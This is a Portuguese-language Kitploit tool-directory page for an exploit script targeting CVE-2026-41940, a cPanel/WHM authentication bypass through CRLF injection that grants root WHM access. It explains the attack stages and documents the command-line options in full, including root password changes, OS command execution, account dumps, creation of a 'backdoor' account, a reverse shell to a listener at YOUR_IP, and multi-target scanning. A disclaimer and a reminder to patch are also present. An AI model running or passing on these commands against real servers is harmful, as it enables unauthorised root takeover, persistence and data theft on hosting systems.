Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/kill1234545/cve-2026-41940
Autenticação e AutorizaçãoEscalada de PrivilégiosMecanismos de PersistênciaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de Penetração
GitHubkill1234545/cve-2026-41940

CVE-2026-41940

Bypass de Autenticação cPanel/WHM (Vulnerabilidade de Dia Zero)

Ver Repositório
102há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-41940: Bypass de Autenticação do cPanel/WHM (Alvo Único e Múltiplos Alvos)

Aviso Legal: Este documento e o script associado (exploit.py) são fornecidos estritamente para fins educacionais, pesquisa de segurança e testes de penetração autorizados. Não use este software contra sistemas que você não possui ou para os quais não tem permissão explícita para testar.

Visão Geral

exploit.py é um script que demonstra uma vulnerabilidade de bypass de autenticação (CVE-2026-41940) no cPanel e WHM. A vulnerabilidade permite que um atacante não autenticado injete uma sessão root no cache do daemon por meio de uma falha de injeção CRLF, concedendo, em última análise, acesso WHM de nível root sem exigir credenciais válidas.

Análise da Vulnerabilidade e Fluxo do Exploit

O exploit funciona aproveitando uma vulnerabilidade de injeção CRLF (Carriage Return Line Feed) no mecanismo de tratamento de Autenticação Básica, combinada com uma falha de propagação de sessão. O script automatiza o ataque em quatro estágios:

  1. Criação de Sessão Pré-Autenticação: Conecta-se a endpoints públicos de login (ex.: /login/ ou /cgi/login.cgi) para obter um cookie de sessão não autenticada de base (whostmgrsession).
  2. Injeção CRLF: Envia um cabeçalho de Autenticação Básica personalizado contendo um payload codificado em Base64 que injeta campos de sessão root diretamente no cache de sessão do cpsrvd. A resposta de redirecionamento do servidor vaza o token de segurança gerado (cpsess).
  3. Propagação de Sessão: O cookie de sessão bruto é enviado para um endpoint WHM autenticado, acionando do_token_denied para propagar a sessão forjada no cache do daemon — tornando-a uma sessão autenticada válida.
  4. Verificação: Acessa endpoints restritos da API WHM (ex.: /json-api/version) usando a sessão forjada para confirmar o acesso de nível root.

Pré-requisitos

  • Python 3.x
  • Biblioteca requests
root@kitploit:~
pip install requests

Uso

root@kitploit:~
python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]

Argumentos

Seleção de Alvo

ArgumentoDescrição
--target URLURL WHM única (ex.: https://target:2087)
--target-file FILEArquivo com alvos (um ip:porta por linha) — ativa automaticamente o modo de verificação

Opções de Rede e Núcleo

ArgumentoDescrição
--threads NThreads concorrentes para o modo multi-alvo (padrão: 10)
--hostname HOSTSubstituir o cabeçalho Host — use quando a descoberta automática falhar ou fornecer um hostname incorreto
--timeout NTempo limite por requisição em segundos (padrão: 15)
--retries NNúmero de tentativas em erros de rede (padrão: 3)
--cookie-name NAMEForçar um nome específico para o cookie de sessão (auto-detectado se omitido)
--no-verifyPular a verificação do Estágio 4 e continuar mesmo assim

Opções de Exploração (Pós-Bypass)

ArgumentoDescrição
--checkModo somente verificação — verifica a vulnerabilidade sem explorar (definido automaticamente com --target-file)
--password PASSAlterar a senha root para PASS
--api FUNCChamar uma função específica da API JSON do WHM
--api-params K=V,...Parâmetros separados por vírgula para --api
--exec CMDExecutar um comando do SO via WHM scripts/run_script (fallback: rawexec)
--sessionGerar uma URL de login root em um clique — abra imediatamente, o token expira rápido
--shellAbrir um shell WHM interativo (somente alvo único)
--dumpExtrair informações do servidor: versão, contas, zonas DNS, privilégios
--add-user USER PASS DOMAINCriar uma nova conta de hospedagem cPanel
--revshell LHOST LPORTEnviar um reverse shell bash para seu listener

Opções de Saída

ArgumentoDescrição
--output FILESalvar o token de sessão e detalhes em um arquivo JSON

Exemplos

root@kitploit:~
# Check if target is vulnerable
python exploit.py --target https://target:2087 --check

# Dump server info (version, accounts, privileges)
python exploit.py --target https://target:2087 --dump

# Generate a one-click root login URL (paste in browser immediately)
python exploit.py --target https://target:2087 --session

# Execute a command
python exploit.py --target https://target:2087 --exec "id"

# Drop into an interactive WHM shell
python exploit.py --target https://target:2087 --shell

# Change root password
python exploit.py --target https://target:2087 --password 'NewP@ss!'

# Call WHM API directly
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1

# Create a backdoor cPanel account
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com

# Send reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444

# Override hostname (use when auto-discovery fails)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check

# Scan multiple targets (check-only mode)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20

# Save session to file
python exploit.py --target https://target:2087 --dump --output results.json

Comandos do Shell Interativo

Ao usar --shell, os seguintes comandos estão disponíveis:

ComandoDescrição
api <function> [k=v ...]Chamar uma função da API JSON do WHM (ex.: api version)
exec <command>Executar um comando do SO via WHM (ex.: exec id)
passwd <newpass>Alterar a senha root
dumpExtrair informações do servidor
revshell <lhost> <lport>Enviar um reverse shell
add <user> <pass> <domain>Criar uma conta cPanel
save <path>Salvar a sessão atual em um arquivo
exit / quitSair do shell

Lembrete

Atualize imediatamente os patches de segurança mais recentes do cPanel/WHM.

Baixar ferramenta